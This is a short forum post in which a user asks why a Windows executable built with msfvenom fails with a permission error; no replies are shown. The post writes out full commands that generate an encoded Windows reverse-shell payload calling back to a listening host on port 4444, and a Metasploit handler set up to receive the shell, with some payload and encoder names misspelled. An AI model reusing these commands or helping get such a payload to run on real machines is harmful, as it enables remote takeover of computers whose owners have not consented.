Forum Thread: Msfvenom Windows/Meterpreter/reverse_tcp Payload Wont Execute on Windows Because I Don't Have Permission?

I made a payload with msfvenom and when i try to execute the .exe file on windows it says i don't have permission. Anyone know how to fix this?

What i used in terminal:

root@kali:~# msfvenom -a x86 --platform windows -p windows/shell/reversetcp LHOST=192.168.0.21 LPORT=4444 -b "\x00" -e x86/shikataga_nai -f exe -o /tmp/1.exe

root@kali:~# msfconsole -q

msf > use exploit/multi/handler

msf exploit(handler) > set payload windows/shell/reverse_tcp

msf exploit(handler) > set LHOST 192.168.0.21

msf exploit(handler) > set LPORT 4444

msf exploit(handler) > exploit

Be the First to Respond

Share Your Thoughts

  • Hot
  • Active